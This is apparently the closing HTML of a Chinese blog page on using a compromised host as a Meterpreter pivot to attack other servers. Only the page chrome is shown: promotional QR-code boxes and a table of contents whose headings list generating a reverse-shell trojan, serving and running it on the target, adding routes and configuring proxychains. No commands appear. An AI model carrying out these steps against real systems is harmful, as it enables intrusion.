href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#扫描指定主机的服务和端口" class="toc-sidebar-link">扫描指定主机的服务和端口</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#列出在目标端口上运行的服务" class="toc-sidebar-link">列出在目标端口上运行的服务</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#过滤服务-只显示开启的服务" class="toc-sidebar-link">过滤服务，只显示开启的服务</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#列出数据库中所有的主机" class="toc-sidebar-link">列出数据库中所有的主机</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#漏洞攻击" class="toc-sidebar-link">漏洞攻击</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#生成反弹木马" class="toc-sidebar-link">生成反弹木马</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#启动kali上的apache服务-并将backdoor-elf放置到服务器中" class="toc-sidebar-link">启动Kali上的Apache服务，并将backdoor.elf放置到服务器中</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#在目标机上下载木马文件" class="toc-sidebar-link">在目标机上下载木马文件</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#在新开启的终端上执行如下命令" class="toc-sidebar-link">在新开启的终端上执行如下命令</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#在目标机上运行木马文件" class="toc-sidebar-link">在目标机上运行木马文件</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#查看反弹的meterpreter终端" class="toc-sidebar-link">查看反弹的Meterpreter终端</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#添加路由" class="toc-sidebar-link">添加路由</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#启动监听" class="toc-sidebar-link">启动监听</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#配置攻击机-192-168-75-10-etc-proxychains-conf" class="toc-sidebar-link">配置攻击机(192.168.75.10)/etc/proxychains.conf</a><ul class="toc-sidebar-sub-headers"></ul></li><li><a href="/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html#配置forefox代理" class="toc-sidebar-link">配置Forefox代理</a><ul class="toc-sidebar-sub-headers"></ul></li></ul></div></div></div></div></div> <div class="option-box"><img src="/images/system/wechat.png" class="nozoom"> <span class="show-txt">手机看</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.9rem">微信扫一扫</span> <img height="180px" src="https://api.qrserver.com/v1/create-qr-code/?data=https://binghe001.github.io/md/hack/tools/2022-05-02-004-Meterpreter%E4%BB%A5%E8%A2%AB%E6%8E%A7%E5%88%B6%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%BA%E8%B7%B3%E6%9D%BF%E6%B8%97%E9%80%8F%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8.html" style="margin:10px;">
                可以<b>手机看</b>或分享至<b>朋友圈</b></div></div></div></div> <div class="option-box"><img src="/images/system/toggle.png" width="30px" class="nozoom"> <span class="show-txt">左栏</span></div> <div class="option-box"><img src="/images/system/xingqiu.png" width="25px" class="nozoom"> <span class="show-txt">星球</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">实战项目<span style="font-size:8px;color:red;">「SpringCloud Alibaba实战项目」</span>、专属电子书、问题解答、简历指导、技术分享、晋升指导、视频课程</span> <img height="180px" src="/images/personal/xingqiu.png" style="margin:10px;"> <b>知识星球</b>：冰河技术
            </div></div></div></div> <div class="option-box"><img src="/images/system/wexin4.png" width="25px" class="nozoom"> <span class="show-txt">读者群</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">添加冰河微信<span style="color:red;">(hacker_binghe)</span>进冰河技术学习交流圈「无任何套路」</span> <img src="/images/personal/hacker_binghe.jpg" height="180px" style="margin:10px;">
                PS：添加时请备注<b>读者加群</b>，谢谢！
              </div></div></div></div> <div class="option-box"><img src="/images/system/download-2.png" width="25px" class="nozoom"> <span class="show-txt">下资料</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">扫描公众号，回复<span style="color:red;">“1024”</span>下载<span style="color:red;">100GB+</span>学习技术资料、PDF书籍、实战项目、简历模板等「无任何套路」</span> <img src="/images/personal/qrcode.png" height="180px" style="margin:10px;"> <b>公众号:</b> 冰河技术
              </div></div></div></div> <div class="option-box"><img src="/images/system/heart-1.png" width="25px" class="nozoom"> <span class="show-txt">赞赏我</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">鼓励/支持/赞赏我</span> <img height="180px" src="/images/personal/encourage-head.png" style="margin:5px;"> <br>1. 不靠它生存但仍希望得到你的鼓励；
                <br>2. 时刻警醒自己保持技术人的初心；
              </div></div></div></div> <div title="PowerShell工具之Powerup详解实录" class="option-box" style="padding-left:2px;text-align:center;"><a href="/md/hack/tools/2022-05-02-003-PowerShell工具之Powerup详解实录.html"><img src="/images/system/pre2.png" width="30px" class="nozoom"> <span class="show-txt">上一篇</span></a></div> <div title="Win10完美去除桌面快捷图标小箭头" class="option-box" style="padding-left:2px;text-align:center;"><a href="/md/hack/tools/2022-05-02-005-Win10完美去除桌面快捷图标小箭头.html"><img src="/images/system/next2.png" width="30px" class="nozoom"> <span class="show-txt">下一篇</span></a></div></div>  <!----> </aside></div><div class="global-ui"><div class="read-more-wrap" style="display:none;position:absolute;bottom:0px;z-index:9999;width:100%;margin-top:-100px;font-family:PingFangSC-Regular, sans-serif;"><div id="read-more-mask" style="position: relative; height: 200px; background: -webkit-gradient(linear, 0 0%, 0 100%, from(rgba(255, 255, 255, 0)), to(rgb(255, 255, 255)));"></div> <a id="read-more-btn" target="_self" style="position: absolute; left: 50%; top: 70%; bottom: 30px; transform: translate(-50%, -50%); width: 160px; height: 36px; line-height: 36px; font-size: 15px; text-align: center; border: 1px solid rgb(222, 104, 109); color: rgb(222, 104, 109); background: rgb(255, 255, 255); cursor: pointer; border-radius: 6px;">阅读全文</a> <div id="btw-modal-wrap" style="display: none;"><div id="btw-mask" style="position: fixed; top: 0px; right: 0px; bottom: 0px; left: 0px; opacity: 0.7; z-index: 999; background: rgb(0, 0, 0);"></div> <div id="btw-modal" style="position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 300px; text-align: center; font-size: 13px; background: rgb(255, 255, 255); border-radius: 10px; z-index: 9999; font-family: PingFangSC-Regular, sans-serif;"><span id="btw-modal-close-btn" style="position: absolute; top: 5px; right: 15px; line-height: 34px; font-size: 34px; cursor: pointer; opacity: 0.2; z-index: 9999; color: rgb(0, 0, 0); background: none; border: none; outline: none;">×</span> <p id="btw-modal-header" style="margin-top: 40px; line-height: 1.8; font-size: 13px;">
                扫码或搜索：<span style="color: #E9405A; font-weight: bold;">冰河技术</span> <br>发送：<span id="fustack-token" class="token" style="color: #e9415a; font-weight: bold; font-size: 17px; margin-bottom: 45px;">290992</span> <br>即可<span style="color: #e9415a; font-weight: bold;">立即永久</span>解锁本站全部文章</p> <img src="/images/personal/qrcode.png" style="width: 180px; margin-top: 10px; margin-bottom: 30px; border: 8px solid rgb(230, 230, 230);"></div></div></div><div class="pay-read-more-wrap" style="display:none;position:absolute;bottom:0px;z-index:9999;width:100%;margin-top:-100px;font-family:PingFangSC-Regular, sans-serif;"><div id="pay-read-more-mask" style="position: relative; height: 200px; background: -webkit-gradient(linear, 0 0%, 0 100%, from(rgba(255, 255, 255, 0)), to(rgb(255, 255, 255)));"></div> <a id="pay-read-more-btn" target="_blank" style="position: absolute; left: 50%; top: 70%; bottom: 30px; transform: translate(-50%, -50%); width: 160px; height: 36px; line-height: 36px; font-size: 15px; text-align: center; border: 1px solid rgb(222, 104, 109); color: rgb(222, 104, 109); background: rgb(255, 255, 255); cursor: pointer; border-radius: 6px;">付费阅读</a></div></div></div>
    <script src="/assets/js/cg-styles.js?v=1653305936337" defer></script><script src="/assets/js/cg-4.js?v=1653305936337" defer></script><script src="/assets/js/cg-3.js?v=1653305936337" defer></script><script src="/assets/js/cg-240.js?v=1653305936337" defer></script><script src="/assets/js/cg-5.js?v=1653305936337" defer></script><script src="/assets/js/cg-6.js?v=1653305936337" defer></script><script src="/assets/js/cg-app.js?v=1653305936337" defer></script>
  </body>
</html>
